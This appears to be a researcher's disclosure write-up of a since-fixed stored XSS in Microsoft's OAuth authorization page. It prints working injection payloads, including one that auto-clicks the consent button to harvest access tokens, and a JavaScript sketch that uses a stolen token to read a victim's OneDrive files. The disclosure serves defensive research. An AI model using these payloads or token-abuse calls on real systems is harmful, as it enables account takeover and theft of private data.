Summary
In this article, I want to talk about one of the latest vulnerabilities I found during my research: a Stored XSS (Cross-Site Scripting) flaw in Microsoft's OAuth interface. My experience as a researcher with this company started two years ago when, out of curiosity, I began looking for the most common flaw that exists in almost every web application, the classic XSS. The final results were not as good as I had expected, just a few XSS issues without massive impact, but enough to get me listed on some of Microsoft's "Acknowledgment Pages". Not long after that, Microsoft announced its official Bug Bounty program for "Online Services", but since I did not have enough time back then, I decided not to participate.
Research
One day, while scrolling through my Twitter feed, I came across a very interesting article about a CSRF vulnerability discovered by Wesley Wineberg in the Microsoft OAuth authorization interface (you can read about it in his write-up). The post made me curious and gave me confidence that I could find a vulnerability there myself, at least as important as that CSRF. So I decided to take a look at the authorization part.
First of all, before I could use the OAuth framework with my test application, I had to register that app. After a few Google searches, I found the following link: https://account.live.com/developers/applications/create?tou=1, which points to the "Microsoft account Developer Center" portal. There I found the registration form, which let me choose an "Application name" and the "Language" for my application.
Since any user input can be an open door to new XSS issues, I tried, as always, to insert a vector that might break the ice: '"></script><img src=x onerror=prompt(1)>. Unfortunately, the application rejected my payload and threw an interesting error.
Digging into that error, we can easily see that the most important characters from my payload, '<' and '>', weren't accepted, but nothing was said about the single quote (') or the double quote ("). So I made the following assumption: if I could find a page anywhere in the authorization process that used my input unencoded, as the value of a tag attribute or inside a script tag, I might be able to break out of it and inject my JavaScript code. I first tried the vector "onload="alert(1), hoping that my payload would end up inside an HTML tag that supports the onload event.
I finished the registration process, and after setting the redirect URL, I was able to generate the authorization link corresponding to my application:
https://login.live.com/oauth20_authorize.srf?client_id=CLIENT_ID&scope=SCOPES&response_type=token&redirect_uri=REDIRECT_URI (you can find more about how Microsoft integrates OAuth2 here: https://msdn.microsoft.com/en-us/library/hh243647.aspx)
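For context, this is the standard OAuth 2.0 implicit grant: with response_type=token, once the user approves the request, the access token is returned by appending it to the redirect URI as a URL fragment, roughly like this (all values are placeholders):
REDIRECT_URI#access_token=ACCESS_TOKEN&token_type=bearer&expires_in=3600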
Opening it in a new tab was, surprisingly, enough to prove the existence of the bug:
In the source code of the page, we can clearly see how my input was parsed by the web application.
On line 212, my payload was used unencoded as the value of the alt attribute, together with a number between parentheses (the registration date and time of the application). The value of the src attribute is the default used when the application owner has not chosen an icon for his app: a link pointing to an image on Microsoft's server. Since that image will always exist there, the JavaScript code used as the value of the onload attribute will execute on every new load of the page.
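Putting the pieces together, the vulnerable line would have rendered roughly like this (a reconstruction; the icon URL and timestamp below are placeholders, not the real values):

```html
<!-- Reconstruction of line 212 of the authorization page -->
<img src="DEFAULT_APP_ICON_URL" alt=""onload="alert(1) (131145692847653000)">
<!-- The double quote in the application name closes the alt attribute, so the browser
     parses an injected onload attribute. The appended registration timestamp simply
     trails inside the handler body and does not stop alert(1) from firing; because the
     default icon always exists on Microsoft's server, the handler runs on every visit. -->
```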
Getting more from this flaw
Even though, at that point, I had a valid vulnerability that could be submitted for investigation, I decided to spend a little more time to see what the maximum impact of my bug could be. A Cross-Site Scripting vulnerability will always rank among the most significant flaws, but "stealing cookies" or "phishing users" was just too boring for me :). So I thought: well, the bug lives in the web page that lets users choose whether to authorize or deny the application access to their account, and they express that decision by clicking the "Yes" or "No" button. What if I inserted a payload that always clicks the "Yes" button on the user's behalf? I could get permission to access users' resources without their knowledge! So far, so good. I created a new application and gave it a new, improved payload: "onload="document.getElementById('idBtn_Accept').click()" param=" which simulates a mouse click on the "Yes" button as soon as the page loads.
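With that application name, the same line would render roughly as follows (again a reconstruction, with placeholder icon URL and timestamp):

```html
<!-- Reconstruction of the authorization page with the auto-click payload -->
<img src="DEFAULT_APP_ICON_URL"
     alt=""onload="document.getElementById('idBtn_Accept').click()" param=" (131145692847653000)">
<!-- The trailing param=" in the payload turns the appended registration timestamp into a
     harmless dummy attribute, keeping the onload handler clean. As soon as the default icon
     loads, the "Yes" button is clicked and the victim's browser is sent to the application's
     redirect_uri with an access token in the URL fragment, where the attacker can collect it. -->
```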
What are the most valuable resources that a hacker could obtain from the victim?
Once an attacker managed to obtain access tokens for a particular account, he could read or modify sensitive information in the victim's account. Among the most dangerous things an attacker could have done (a rough sketch of such access follows the list below):
- Reading all the emails from the Outlook account (using IMAP) and sending new emails on behalf of the user (using SMTP)
- Reading all the files stored in OneDrive
- Reading all the user's photos, videos, audio, and albums
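As an illustration of what that access could look like in practice, here is a minimal sketch. The endpoint paths are based on my understanding of the Live Connect REST API (v5.0) that backed these scopes at the time; they, and the STOLEN_ACCESS_TOKEN placeholder, are assumptions rather than verified calls.

```javascript
// Illustrative sketch only: endpoints and response shapes are assumptions based on
// the Live Connect REST API (v5.0), not a verified, current Microsoft API.
const token = "STOLEN_ACCESS_TOKEN"; // harvested from the redirect URL fragment

// Basic profile information for the victim's account
fetch("https://apis.live.net/v5.0/me?access_token=" + encodeURIComponent(token))
  .then(res => res.json())
  .then(profile => console.log(profile));

// Top-level files stored in the victim's OneDrive (SkyDrive in the v5.0 naming)
fetch("https://apis.live.net/v5.0/me/skydrive/files?access_token=" + encodeURIComponent(token))
  .then(res => res.json())
  .then(files => console.log(files));
```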
How this flaw could be exploited easily
Considering that this XSS was stored and required no user interaction, it could be exploited simply by getting the victim to visit a malicious link. Such a link, spread on social networks (Facebook, Twitter, etc.) along with a good "story", could claim many victims in a short span of time.
However, the victims would have to be logged into their Microsoft accounts, or log in at the moment they opened the link, but that would not be a significant obstacle.
Fix
Microsoft has fixed this issue, and all dangerous characters are now encoded as HTML entities.
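To illustrate what that kind of output encoding does (this shows the general idea, not Microsoft's exact implementation; the icon URL and timestamp are placeholders), the earlier payload now reaches the page with its quotes neutralised, so it can no longer close the alt attribute:

```html
<img src="DEFAULT_APP_ICON_URL" alt="&quot;onload=&quot;alert(1) (131145692847653000)">
```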
Thanks for reading, @dekeeu